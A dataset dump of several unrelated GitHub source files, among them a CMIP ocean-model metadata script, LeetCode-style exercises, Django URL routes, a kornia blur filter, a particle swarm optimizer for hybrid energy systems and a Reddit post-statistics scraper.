NCC, c/o MET-Norway, Henrik Mohns plass 1, Oslo 0313, Norway\",\n\"NERC\":\"Natural Environment Research Council, STFC-RAL, Harwell, Oxford, OX11 0QX, UK\",\n\"NIMS-KMA\":\"National Institute of Meteorological Sciences/Korea Meteorological Administration, Climate Research Division, Seoho-bukro 33, Seogwipo-si, Jejudo 63568, Republic of Korea\",\n\"NIWA\":\"National Institute of Water and Atmospheric Research, Hataitai, Wellington 6021, New Zealand\",\n\"NOAA-GFDL\":\"National Oceanic and Atmospheric Administration, Geophysical Fluid Dynamics Laboratory, Princeton, NJ 08540, USA\",\n\"NTU\":\"National Taiwan University, Taipei 10650, Taiwan\",\n\"NUIST\":\"Nanjing University of Information Science and Technology, Nanjing, 210044, China\",\n\"PCMDI\":\"Program for Climate Model Diagnosis and Intercomparison, Lawrence Livermore National Laboratory, Livermore, CA 94550, USA\",\n\"PNNL-WACCEM\":\"PNNL (Pacific Northwest National Laboratory), Richland, WA 99352, USA\",\n\"RTE-RRTMGP-Consortium\":\"AER (Atmospheric and Environmental Research, Lexington, MA 02421, USA); UColorado (University of Colorado, Boulder, CO 80309, USA). Mailing address: AER c/o Eli Mlawer, 131 Hartwell Avenue, Lexington, MA 02421, USA\",\n\"RUBISCO\":\"ORNL (Oak Ridge National Laboratory, Oak Ridge, TN 37831, USA); ANL (Argonne National Laboratory, Argonne, IL 60439, USA); BNL (Brookhaven National Laboratory, Upton, NY 11973, USA); LANL (Los Alamos National Laboratory, Los Alamos, NM 87545); LBNL (Lawrence Berkeley National Laboratory, Berkeley, CA 94720, USA); NAU (Northern Arizona University, Flagstaff, AZ 86011, USA); NCAR (National Center for Atmospheric Research, Boulder, CO 80305, USA); UCI (University of California Irvine, Irvine, CA 92697, USA); UM (University of Michigan, Ann Arbor, MI 48109, USA). Mailing address: ORNL Climate Change Science Institute, c/o Forrest M. 
Hoffman, Laboratory Research Manager, Building 4500N Room F106, 1 Bethel Valley Road, Oak Ridge, TN 37831-6301, USA\",\n\"SNU\":\"Seoul National University, Seoul 08826, Republic of Korea\",\n\"THU\":\"Department of Earth System Science, Tsinghua University, Beijing 100084, China\",\n\"UA\":\"Department of Geosciences, University of Arizona, Tucson, AZ 85721, USA\",\n\"UCI\":\"Department of Earth System Science, University of California Irvine, Irvine, CA 92697, USA\",\n\"UHH\":\"Universitat Hamburg, Hamburg 20148, Germany\",\n\"UTAS\":\"Institute for Marine and Antarctic Studies, University of Tasmania, Hobart, Tasmania 7001, Australia\",\n\"UofT\":\"Department of Physics, University of Toronto, 60 St George Street, Toronto, ON M5S1A7, Canada\"\n'''\n\n# %% Build list of models per MIP\n# Get time\ntimeFormatDir = datetime.datetime.now().strftime('%y%m%d')\n# List input files\nfileList = os.listdir(os.path.join('..', timeFormatDir))\nfileList.sort()\nprint('fileList:', fileList)\n\n# %% Build dictionary keying off source_id\nmips = {}\nmips['CMIP6'] = {}\nmips['CMIP5'] = {}\nmips['CMIP3'] = {}\n\nqueries = {'modId': 'ocean model id (+ version)',\n 'eos': 'equation of state (+ constants)',\n 'cp': 'specific heat capacity (cpocean, J kg-1 K-1)',\n 'refRho': 'reference density (boussinesq; rhozero, kg m-3)',\n 'frzEqn': 'freezing point (equation)',\n 'angRot': 'planet angular rotation (radians s-1)',\n 'graAcc': 'gravitational acceleration (m s-2)',\n 'horRes': 'native horizontal resolution',\n 'verRes': 'native vertical resolution',\n 'vertK': 'vertical diffusivity scheme',\n 'mldSch': 'boundary-layer (mixed-) scheme',\n 'vol': 'sea water volume',\n 'initCl': 'initialization observed climatology',\n 'spinYr': 'spinup length (years)',\n 'antAer': 'anthropogenic aerosol forcing',\n 'volcFo': 'volcanic forcing',\n 'aerInd': 'sulphate aerosol indirect effects',\n 'geotHt': 'geothermal heating'}\n\nfor count1, filePath in enumerate(fileList):\n if filePath in ['.DS_Store', 'ESGF.json']:\n continue\n print('count1', count1, 'filePath:', filePath)\n fullPath = os.path.join('..', timeFormatDir, filePath)\n print('fullPath:', fullPath)\n with open(fullPath) as jsonFile:\n a = json.load(jsonFile)\n print('a.keys():', a.keys())\n print('a[''response''].keys():', a['response'].keys())\n # Use source_id indexes to build out tree\n for count2, tmp in enumerate(a['response']['docs']):\n print('count2:', count2, 'id:', tmp['id'])\n [mipEra, actId, instId, srcId, expId, ripfId, tabId, varId,\n gridId, verId, nodeId] = siftBits(tmp['id'])\n print('mipEra:', mipEra)\n print('actId:', actId)\n print('instId:', instId)\n print('srcId:', srcId)\n print('expId:', expId)\n print('ripfId:', ripfId)\n print('tabId:', tabId)\n print('varId:', varId)\n print('gridId:', gridId)\n print('verId:', verId)\n print('nodeId:', nodeId)\n # Build json\n if instId not in mips[mipEra].keys():\n mips[mipEra][instId] = {}\n if srcId not in mips[mipEra][instId].keys():\n mips[mipEra][instId][srcId] = {}\n if actId not in mips[mipEra][instId][srcId].keys():\n mips[mipEra][instId][srcId][actId] = {}\n if expId not in mips[mipEra][instId][srcId][actId].keys():\n mips[mipEra][instId][srcId][actId][expId] = {}\n if ripfId not in mips[mipEra][instId][srcId][actId][expId].keys():\n mips[mipEra][instId][srcId][actId][expId][ripfId] = {}\n for count3, query in enumerate(queries.keys()):\n print(count3, query)\n mips[mipEra][instId][srcId][actId][expId][ripfId][queries[\n query]] = None\n print(fullPath)\n print('----------')\n 
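# Aside (illustrative sketch, not part of the original script). The chain of
# "if key not in d.keys(): d[key] = {}" guards above can be collapsed with
# dict.setdefault, which returns the existing child dict or installs a new one:
def ensure_branch(tree, *keys):
    # walk (and extend) the nested dict one level per key, returning the leaf dict
    for k in keys:
        tree = tree.setdefault(k, {})
    return tree

# e.g. ensure_branch(mips, mipEra, instId, srcId, actId, expId, ripfId) reaches the
# same leaf dict the nested if-ladder builds, one line per record.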
print('----------')\n        time.sleep(3)\n\n# Process mipEra result\noutFile = os.path.join('..', 'CMIP_ESGF.json')\nprint('outFile:', outFile)\nwith open(outFile, 'w', encoding='utf-8') as outJson:\n    json.dump(mips, outJson, ensure_ascii=False, indent=4, sort_keys=True)\n\n# %% Build webpages per mipEra\n","repo_name":"durack1/CMIPOcean","sub_path":"src/readOceanMods.py","file_name":"readOceanMods.py","file_ext":"py","file_size_in_byte":22613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71308765725","text":"class NodeList:\n    def __init__(self, val=None, _next=None):\n        self.val = val\n        self.next = _next\n\nclass Solution:\n    def mergeTwoLists(self, l1, l2):\n        # dummy head simplifies splicing; return dummy.next at the end\n        res = NodeList(None)\n\n        node = res\n        while l1 and l2:\n            if l1.val < l2.val:\n                node.next, l1 = l1, l1.next\n            else:\n                node.next, l2 = l2, l2.next\n            node = node.next\n\n        # attach whichever list still has nodes left\n        if l1:\n            node.next = l1\n        else:\n            node.next = l2\n\n        return res.next\n","repo_name":"buxuele/algo_snippet","sub_path":"junk/21_03_try_myself.py","file_name":"21_03_try_myself.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1272380429","text":"from django.urls import path, include\n\nfrom .views import *\n\napp_name = \"business\"\n\nbusiness_day_patterns = ([\n    path('create/', businessday_create, name='create'),\n    path('/profile/', business_profile, name='profile'),\n    path('/edit/', BusinessDayEdit.as_view(), name='edit'),\n    path('/delete/', BusinessDayDel.as_view(), name='delete'),\n    ], 'businessday')\n\nadmin_patterns = ([\n    path('calendar/', business_calendar, name='calendar'),\n    path('calendar/data/', get_calendar_data_admin, name='data'),\n    ], 'admin')\n\nfrontend_patterns = ([\n    path('calendar/data/', get_calendar_data_frontend, name='data'),\n    ], 'frontend')\n\nutils_patterns = ([\n    path('//get/hours/', businessday_get_hours, name='hours'),\n    path('///check/', check_businessday, name='check')\n    ], 'utils')\n\nurlpatterns = [\n    path('businessday/', include(business_day_patterns)),\n    path('admin/', include(admin_patterns)),\n    path('frontend/', include(frontend_patterns)),\n    path('utils/', include(utils_patterns)),\n]\n","repo_name":"alexiuasse/Gerenciamento-de-Salao-Beleza","sub_path":"app/business/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8435740081","text":"\"\"\"\nDecrypt String from Alphabet to Integer Mapping (Easy)\n\nGiven a string s formed by digits ('0' - '9') and '#' . We want to map s to English lowercase characters as follows:\n\nCharacters ('a' to 'i') are represented by ('1' to '9') respectively.\nCharacters ('j' to 'z') are represented by ('10#' to '26#') respectively. 
\nReturn the string formed after mapping.\n\nIt's guaranteed that a unique mapping will always exist.\n\n \n\nExample 1:\n\nInput: s = \"10#11#12\"\nOutput: \"jkab\"\nExplanation: \"j\" -> \"10#\" , \"k\" -> \"11#\" , \"a\" -> \"1\" , \"b\" -> \"2\".\nExample 2:\n\nInput: s = \"1326#\"\nOutput: \"acz\"\nExample 3:\n\nInput: s = \"25#\"\nOutput: \"y\"\nExample 4:\n\nInput: s = \"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\"\nOutput: \"abcdefghijklmnopqrstuvwxyz\"\n \n\nConstraints:\n\n1 <= s.length <= 1000\ns[i] only contains digits letters ('0'-'9') and '#' letter.\ns will be valid string such that mapping is always possible.\n\"\"\"\n\n\"\"\"\nfunction that converts digits to characters\nKNOWN LIMITATIONS - solution can be optimized\n\"\"\"\ndef freqAlphabets(s):\n if (type(s) != str):\n return \"Invalid Input\"\n decrypted_string = \"\"\n last_hash_pos = 0\n for i in range(len(s)):\n #if we get to a #, convert all digits from last # pos until you get to the two digits\n # right before the #\n #Then concatenate the two digits and convert to the respective character\n if (s[i] == '#'):\n for x in range(last_hash_pos, (i-2)):\n decrypted_string += chr(int(s[x])+96)\n decrypted_string += chr(int(s[i-2:i])+ 96)\n last_hash_pos = i+1\n elif (not s[i].isdigit()):\n return \"Invalid Input\"\n else:\n continue\n #after going through the string, convert any digits after the last # pos to characters\n if (last_hash_pos-1 != len(s)):\n for i in range(last_hash_pos, len(s)):\n decrypted_string += chr(int(s[i])+96)\n return decrypted_string\n\n\"\"\"\nfunction that declares and initializes strings to be tested\n\"\"\"\ndef test_freqAlphabets():\n #initialize input strings. for testing purposes, i have created multiple valid and invalid tuples.\n # the input string is in index 0 and the expected output is in index 1\n test_num = 0\n empty_string = (\"\",\"\")\n non_int_string = (\"abcd\",\"Invalid Input\")\n single_char_invalid = ('k', \"Invalid Input\")\n simple_invalid_string = (\"12.345\", \"Invalid Input\")\n mixed_invalid_string = (\"1*2c4?.d\", \"Invalid Input\")\n simple_string = (\"12345\", \"abcde\")\n one_letter_string = (\"9\", \"i\")\n double_digit_letter = (\"25#\", \"y\")\n simple_string_2 = (\"10#11#12\", \"jkab\")\n long_string = (\"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\", \"abcdefghijklmnopqrstuvwxyz\")\n\n for test_list in (empty_string,\n non_int_string,\n single_char_invalid,\n simple_invalid_string,\n mixed_invalid_string,\n simple_string,\n one_letter_string,\n double_digit_letter,\n simple_string_2,\n long_string):\n test_num+=1\n print (\"================ Test \", test_num, \" ================\")\n print (\"Input: \", test_list[0])\n print (\"Expected: \", test_list[1])\n print (\"Output: \", freqAlphabets(test_list[0]))\n if (test_list[1] == freqAlphabets(test_list[0])):\n print (\"PASS\")\n else:\n print (\"FAIL\")\n\nif __name__ == '__main__': \n test_freqAlphabets()","repo_name":"kabirolatinwo/programming-challenges","sub_path":"decryptString.py","file_name":"decryptString.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"22519711267","text":"qualifications = (2, 4, 6, 8)\n\ndef content(items, index):\n try:\n result = items[index]\n except:\n result = None\n\n return result\n\ndef length(items):\n index = 0\n while content(items, index) != None:\n index = index + 1\n\n return index\n\nsum = 0\n\nfor index in range(0, 
length(qualifications)):\n sum = sum + qualifications[index]\n\nmedia = sum / length(qualifications)\n\nprint(\"Number of items:\", length(qualifications))\nprint(\"Final qualification........\", sum)\nprint(\"Media........\", media)\n","repo_name":"marinavicenteartiaga/KeepCodingModernProgrammingWithPython","sub_path":"module0/e6.py","file_name":"e6.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33484896395","text":"ctemps = [-40, 0, 37, 75, 100]\n\nfor celsius in ctemps:\n fahrenheit = ((9 * celsius) / 5) + 32\n # f\"...{VARIABLE}....{VARIABLE:FMT}...\"\"\n print(f\"{celsius:5.1f} C is {fahrenheit:5.1f} F\")\n\nfruits = [\n ' MANGO', 'Apple', ' peach ', 'PLUM ', ' Apricot',\n 'BaNaNa', 'Persimmon '\n]\n\nclean_fruits = [f.strip().lower() for f in fruits]\nprint(f\"clean_fruits: {clean_fruits}\")\n\nclean_fruits = []\nfor bbq in fruits:\n # f = fruits[0]\n # f = fruits[1]\n # f = fruits[2]\n # ...\n # f = fruits[6]\n value = bbq.strip().lower()\n clean_fruits.append(value)\n\n","repo_name":"jstrickler/20230501boot","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71542478364","text":"from typing import Tuple\n\nimport torch\nimport torch.nn as nn\n\nimport kornia\nfrom kornia.filters.kernels import get_box_kernel2d\nfrom kornia.filters.kernels import normalize_kernel2d\n\n\nclass BoxBlur(nn.Module):\n r\"\"\"Blurs an image using the box filter.\n\n The function smooths an image using the kernel:\n\n .. math::\n K = \\frac{1}{\\text{kernel_size}_x * \\text{kernel_size}_y}\n \\begin{bmatrix}\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n \\vdots & \\vdots & \\vdots & \\ddots & \\vdots & \\vdots \\\\\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n \\end{bmatrix}\n\n Args:\n kernel_size (Tuple[int, int]): the blurring kernel size.\n border_type (str): the padding mode to be applied before convolving.\n The expected modes are: ``'constant'``, ``'reflect'``,\n ``'replicate'`` or ``'circular'``. 
Default: ``'reflect'``.\n normalized (bool): if True, L1 norm of the kernel is set to 1.\n\n Returns:\n torch.Tensor: the blurred input tensor.\n\n Shape:\n - Input: :math:`(B, C, H, W)`\n - Output: :math:`(B, C, H, W)`\n\n Example:\n >>> input = torch.rand(2, 4, 5, 7)\n >>> blur = kornia.filters.BoxBlur((3, 3))\n >>> output = blur(input) # 2x4x5x7\n \"\"\"\n\n def __init__(self, kernel_size: Tuple[int, int],\n border_type: str = 'reflect',\n normalized: bool = True) -> None:\n super(BoxBlur, self).__init__()\n self.kernel_size: Tuple[int, int] = kernel_size\n self.border_type: str = border_type\n self.kernel: torch.Tensor = get_box_kernel2d(kernel_size)\n self.normalized: bool = normalized\n if self.normalized:\n self.kernel = normalize_kernel2d(self.kernel)\n\n def __repr__(self) -> str:\n return self.__class__.__name__ +\\\n '(kernel_size=' + str(self.kernel_size) + ', ' +\\\n 'normalized=' + str(self.normalized) + ', ' + \\\n 'border_type=' + self.border_type + ')'\n\n def forward(self, input: torch.Tensor): # type: ignore\n return kornia.filter2D(input, self.kernel, self.border_type)\n\n\n# functiona api\n\n\ndef box_blur(input: torch.Tensor,\n kernel_size: Tuple[int, int],\n border_type: str = 'reflect',\n normalized: bool = True) -> torch.Tensor:\n r\"\"\"Blurs an image using the box filter.\n\n See :class:`~kornia.filters.BoxBlur` for details.\n \"\"\"\n return BoxBlur(kernel_size, border_type, normalized)(input)\n","repo_name":"BingyaoHuang/DeProCams","sub_path":"src/python/kornia/filters/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"86"} +{"seq_id":"23330619721","text":"s = list(input())\r\nans = []\r\nfor i in range(1,len(s)-1):\r\n for j in range(i + 1,len(s)):\r\n first = s[ : i]\r\n second = s[i : j]\r\n third = s[j : ]\r\n first.reverse()\r\n second.reverse()\r\n third.reverse()\r\n tmp = first + second + third\r\n ans.append(''.join(tmp))\r\nans.sort()\r\nprint(ans[0])\r\n\r\n\r\n","repo_name":"juhyun-99/Baekjoon_algorithm","sub_path":"백준/Silver/1251. 
단어 나누기/단어 나누기.py","file_name":"단어 나누기.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21287823021","text":"import os\nimport re\nimport itertools \nimport comparator\nimport json\nimport math\n\n\nREGEX = re.compile('.*[.](c|cpp|java)$')\ndef is_cppsrc(srcname):\n return (REGEX.match(srcname) != None)\n\n\ndef get_result(test_dir):\n TEST_dir=test_dir\n print('preprocessing...')\n\n # list() so the filtered names can be indexed and re-used under Python 3\n srcnames = list(filter(is_cppsrc,os.listdir(test_dir)))\n\n # list() again: len() and iteration below fail on a bare map object in Python 3\n seq_name_pairs = list(map(lambda srcname: \n (comparator.get_sequence_from(test_dir + srcname), srcname), srcnames))\n\n print('computing match scores of all pairs...')\n scores = []\n\n name_map=dict()\n count =0\n\n mother_score=dict()\n error_dna=[]\n\n nodes_array=[]\n seq_name_pairs2=[]\n\n re_lang=dict()\n\n re_lang[\"NofCode\"]=len(seq_name_pairs)\n\n NofC=0\n NofCPP=0\n NofJAVA=0\n NofPY=0\n Nofelse=0\n\n mtc_N=0\n mtc=\"\"\n\n for i in seq_name_pairs:\n token_count=i[0].count('#');\n\n if mtc_N < token_count :\n mtc=i[1]\n mtc_N=token_count\n\n if token_count < 35 :\n error_dna.append(i[1])\n continue\n\n str1=i[0]\n mother_score[i[1]]=comparator.match_score_local(str1,str1)\n\n ext=i[1].split('.')\n ext=ext[1]\n\n print (ext)\n\n if ext == \"c\" :\n NofC+=1\n elif ext == \"cpp\" :\n NofCPP+=1\n elif ext == \"java\" :\n NofJAVA+=1\n elif ext == \"py\" :\n NofPY+=1\n else :\n Nofelse+=1\n\n\n\n name_map[i[1]]=i[1]\n re_node={\"name\":name_map[i[1]]}\n nodes_array.append(re_node)\n seq_name_pairs2.append(i)\n\n re_lang[\"NofC\"]=NofC\n re_lang[\"NofCPP\"]=NofCPP\n re_lang[\"NofJAVA\"]=NofJAVA\n re_lang[\"NofPY\"]=NofPY\n\n for pair in itertools.combinations(seq_name_pairs2,2):\n (a,b) = pair\n str1=a[0]\n str2=b[0]\n\n\n str1=re.sub('#ID','',a[0])\n str2=re.sub('#ID','',b[0])\n \n score1=float(comparator.match_score_local(str1,str2))/float(mother_score[a[1]])\n score1=score1*100\n score2=float(comparator.match_score_local(str2,str1))/float(mother_score[b[1]])\n score2=score2*100\n score=max(score1,score2)\n\n if score >20.0:\n # keep the score numeric so sort() orders by value, not lexicographically\n score=round(score,4)\n scores.append((score,a,b))\n\n scores.sort(reverse=True)\n\n result_st=[]\n result=dict()\n links_array=[]\n links_array2=[]\n count=1;\n for tup in scores:\n (score,a,b) = tup\n name_a = a[1]\n name_b = b[1]\n\n str_score=str(score)\n str_score=str_score[:5]\n\n \n\n len_a = a[0].count('#')\n len_b = b[0].count('#')\n re_link={\"source\":name_map[name_a],\"target\":name_map[name_b],\"weight\":str_score}\n links_array.append(re_link)\n result_st.append(re_score(count,name_a,len_a,name_b,len_b,score) )\n\n re_link2={\"number\":count,\"file1\":name_map[name_a],\"len1\":len_a, \"file2\":name_map[name_b],\"len2\":len_b, \"score\":str_score}\n links_array2.append(re_link2)\n\n count=count+1 \n\n result[\"nodes\"]=nodes_array\n result[\"links\"]=links_array\n\n with open('example.json','w') as make_file:\n json.dump(result,make_file,indent=2)\n\n\n print('plotting result.')\n return (links_array2, json.dumps(result,indent=2), error_dna, re_lang ,TEST_dir, mtc, mtc_N)\n\n\nclass re_score:\n def __init__(self,number ,file1, len1, file2, len2, score):\n self.number=number\n self.file1=file1\n self.len1=len1\n self.file2=file2\n self.len2=len2\n self.score=score\n","repo_name":"hanseonghye/Detective-HAN-E","sub_path":"else/makeGraph/pla.py","file_name":"pla.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} 
+{"seq_id":"32215073821","text":"import os\r\nfrom pathlib import Path\r\n\r\n\r\n## Private methods\r\ndef _pathExists(filePath):\r\n\treturn os.path.exists(filePath)\r\n\r\ndef _ppError(msg):\r\n\tstar_length = 13 + len(msg) #13 represents length of hard-coded Error decoration\r\n\tprint(\"*\" * star_length)\r\n\tprint(\"** Error: %s **\" % msg)\r\n\tprint(\"*\" * star_length)\r\n\r\n\r\n## Public methods\r\ndef makeDirectory(filePath):\r\n\ttry:\r\n\t\tif not _pathExists(filePath):\r\n\t\t\tos.makedirs(filePath)\r\n\t\telse:\r\n\t\t\tmsg = \"Directory already exists.\"\r\n\t\t\treturn _ppError(msg)\r\n\texcept (IOError, OSError):\r\n\t\tmsg = \"Directory cannot be created! Possibly permission error?\"\r\n\t\treturn _ppError(msg)\r\n\r\ndef osPathSplitHelper(pathToFile):\r\n\tpathObj = Path(pathToFile)\r\n\r\n\tparentDir = str(pathObj.parent)\r\n\tfilename, fileExt = os.path.splitext(pathObj.name)\r\n\r\n\treturn (parentDir, filename, fileExt)","repo_name":"euteryum/mediapy","sub_path":"mediapy/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4689888123","text":"# coding:utf-8\n\nimport threading\nimport time\n\ngl_num = 0\n\nlock = threading.RLock()\n\n\n# 调用acquire([timeout])时,线程将一直阻塞,\n# 直到获得锁定或者直到timeout秒后(timeout参数可选)。\n# 返回是否获得锁。\ndef Func():\n lock.acquire()#锁上\n global gl_num\n gl_num += 1\n time.sleep(1)\n print (gl_num,time.ctime())\n lock.release()#打开锁\n\n\nfor i in range(10):\n t = threading.Thread(target=Func)\n t.start()","repo_name":"Huanglei2010/pythonStudy","sub_path":"p170807a/src/two/37_8.py","file_name":"37_8.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17577578593","text":"import matplotlib.pyplot as plt\r\nfrom Results import Gen_Results\r\n# Loading Inputs\r\nfrom Input_Data import InData\r\nimport numpy as np\r\nfrom copy import copy, deepcopy\r\nfrom time import process_time\r\n\r\nstart = process_time()\r\n\r\nPV = InData.PV\r\nWT = InData.WT\r\nBat = InData.Bat\r\nDG = InData.DG\r\nRun_Time = InData.Run_Time\r\nnPop = InData.nPop\r\nMaxIt = InData.MaxIt\r\nc1 = InData.c1\r\nc2 = InData.c2\r\nwdamp = InData.wdamp\r\n\r\n# Problem Definition\r\nfrom Fitness import fitness as cost_function\r\n\r\n\r\nclass Swarm:\r\n def __init__(self, **kwargs):\r\n self.nVar = 5 # number of decision variables\r\n\r\n # Variable: PV number, WT number, Battery number, number of DG, Rated Power Inverter\r\n self.VarMin = np.array([0, 0, 0, 0, 0]) * [PV, WT, Bat, DG, 1] # Lower bound of variables\r\n self.VarMax = np.array([120, 240, 120, 10, 50]) * [PV, WT, Bat, DG, 1] # Upper bound of variables\r\n\r\n # Velocity limits\r\n self.VelMax = 0.3 * (self.VarMax - self.VarMin)\r\n self.VelMin = -self.VelMax\r\n # Solution\r\n self.solution_best_costs = []\r\n self.solution_best_positions = []\r\n self.solution_cost_curve = []\r\n\r\n def optimize(self):\r\n w = InData.w\r\n plt.rcParams[\"font.family\"] = \"Times New Roman\"\r\n fig, ax = plt.subplots(dpi=300)\r\n for tt in range(Run_Time):\r\n\r\n # Initialize particle positions\r\n particle_positions = np.random.uniform(self.VarMin, self.VarMax, (1, nPop, self.nVar))[0]\r\n particle_personal_best_position = deepcopy(particle_positions)\r\n\r\n # Initialize particle velocities\r\n particle_velocities = np.zeros((nPop, self.nVar))\r\n\r\n # Evaluate costs per initial particle\r\n particle_costs = 
np.apply_along_axis(cost_function, 1, particle_positions)\r\n particle_personal_best_cost = deepcopy(particle_costs)\r\n\r\n # Determine global best\r\n min_cost_index = np.argmin(particle_personal_best_cost)\r\n global_best_position = deepcopy(particle_personal_best_position[min_cost_index])\r\n global_best_cost = particle_personal_best_cost[min_cost_index]\r\n\r\n # Track Best Costs and Mean Costs\r\n best_cost, mean_cost = [], []\r\n\r\n # PSO Main Loop\r\n for it in range(1, MaxIt + 1):\r\n for i in range(nPop):\r\n # Update Velocity\r\n particle_velocities[i] = w * particle_velocities[i] + c1 * np.random.rand(self.nVar) \\\r\n * (particle_personal_best_position[i] - particle_positions[i]) \\\r\n + c2 * np.random.rand(self.nVar) * (\r\n global_best_position - particle_positions[i])\r\n\r\n # Apply Velocity Limits\r\n particle_velocities[i] = np.minimum(np.maximum(particle_velocities[i], self.VelMin), self.VelMax)\r\n\r\n # Update Position\r\n particle_positions[i] += particle_velocities[i]\r\n\r\n # Velocity Mirror Effect\r\n is_outside = \\\r\n (np.less(particle_positions[i], self.VarMin) | np.greater(particle_positions[i], self.VarMax))[0]\r\n particle_velocities[i][is_outside] = -particle_velocities[i][is_outside]\r\n\r\n # Apply Position Limits\r\n particle_positions[i] = np.minimum(np.maximum(particle_positions[i], self.VarMin), self.VarMax)\r\n\r\n # Evaluation\r\n particle_costs[i] = cost_function(particle_positions[i])\r\n\r\n # Update Personal Best\r\n if particle_costs[i] < particle_personal_best_cost[i]:\r\n particle_personal_best_position[i] = particle_positions[i]\r\n particle_personal_best_cost[i] = particle_costs[i]\r\n\r\n # Update Global Best\r\n if particle_personal_best_cost[i] < global_best_cost:\r\n global_best_cost = particle_personal_best_cost[i]\r\n global_best_position = particle_personal_best_position[i]\r\n\r\n # Add new best cost and mean cost\r\n best_cost.append(global_best_cost)\r\n mean_cost.append(sum(particle_personal_best_cost) / nPop)\r\n\r\n # Update inertia factor\r\n w *= wdamp\r\n\r\n # Print results for current iteration\r\n print(\r\n f'Run time = {tt}, Iteration = {it}, Best Cost = {round(global_best_cost, 4)}, Mean Cost = {round(mean_cost[-1], 4)}')\r\n\r\n self.solution_best_costs.append(global_best_cost)\r\n self.solution_best_positions.append(global_best_position)\r\n self.solution_cost_curve.append(best_cost)\r\n\r\n ax.plot(best_cost, '-.', label=str(tt+1))\r\n\r\n Best= [self.solution_best_costs[t] for t in range(len(self.solution_best_positions))]\r\n index = np.argmin(Best)\r\n X = self.solution_best_positions[index]\r\n\r\n # Run Results file\r\n\r\n plt.xlabel('Iteration')\r\n plt.ylabel('Cost of Best Solution')\r\n plt.title('Convergence curve')\r\n plt.legend() # Display the legend\r\n plt.tight_layout()\r\n plt.show()\r\n Gen_Results(X)\r\n\r\n","repo_name":"Sas1997/SAMA","sub_path":"Python Source Code Final Version/swarm.py","file_name":"swarm.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5423959591","text":"\r\nfrom asyncpraw import Reddit\r\nfrom Server import Server\r\nfrom asyncio import sleep\r\nfrom util import BD, loop, CommentBD, PostBD, re_q2, re_q\r\nfrom time import time\r\nfrom typing import List\r\nimport config\r\n\r\n\r\nclass RedditStat:\r\n def __init__(self, sub):\r\n self.target_sub = sub\r\n self.reddit_session = None\r\n self.max_get_post = 1000\r\n self.max_time_stat = 3600*24*2\r\n\r\n self.parser 
= (\r\n (3600, 60*15),\r\n (3600*3, 60*30),\r\n (3600*6, 60*45),\r\n (3600*24, 60*90),\r\n (3600*24*3, 60*60*4),\r\n (3600*24*7, 60*60*8),\r\n (3600*24*14, 60*60*16),\r\n (3600*24*30, 60*60*30),\r\n (3600*24*90, 60*60*24*5),\r\n )\r\n\r\n self.parser = sorted(self.parser, reverse=True)\r\n\r\n def auth(self, client_id: str, client_secret: str):\r\n user_agent = ('Mozilla/5.0 (Windows NT 6.2; WOW64; rv:53.0) AppleWebKit/534.50.2 '\r\n 'Firefox/49.0 Chrome/58.0.2902.81 Chromium/49.0.2623.108 OPR/43.0.2442.849')\r\n\r\n self.reddit_session = Reddit(client_id=client_id,\r\n client_secret=client_secret,\r\n user_agent=user_agent)\r\n\r\n async def get_new_posts(self):\r\n while True:\r\n subreddit = await self.reddit_session.subreddit(self.target_sub)\r\n t = int(time())\r\n ind = 0\r\n async for post in subreddit.new(limit=self.max_get_post):\r\n ind += 1\r\n _time = int(post.created_utc)\r\n if t - _time > self.max_time_stat:\r\n break\r\n\r\n self.save_post(post, t)\r\n\r\n if ind % 25 == 0:\r\n print(ind, '/', self.max_get_post)\r\n\r\n await sleep(60*20)\r\n\r\n def save_post(self, post, t):\r\n ans: List[PostBD] = BD.post.get(post.id)\r\n if not ans:\r\n content = str(post.media or post.selftext or post.url)\r\n score = f'{post.score}={t}'\r\n BD.post.put(post.id, post.title, post.score, score, content, int(post.created_utc), t)\r\n else:\r\n score = f'{ans[0].score},{post.score}={t}'\r\n ans[0].up(score_now=post.score, score=score)\r\n\r\n async def get_comments(self, post_id: str):\r\n post = await self.reddit_session.submission(post_id)\r\n comments_list = await post.comments()\r\n await comments_list.replace_more(limit=None)\r\n now_time = time()\r\n for j, comment in enumerate(await comments_list.list()):\r\n if now_time - post.created_utc > self.max_time_stat:\r\n continue\r\n\r\n if comment:\r\n self.save_comment(self.comment(comment, post_id))\r\n else:\r\n print(comment)\r\n\r\n #if j % 25 == 0:\r\n # print('get comment', post_id, j)\r\n\r\n def comment(self, comment, post_id):\r\n root_id = '0' if comment.is_root else comment.parent_id.split('_')[-1]\r\n author = comment.author.name if comment.author else 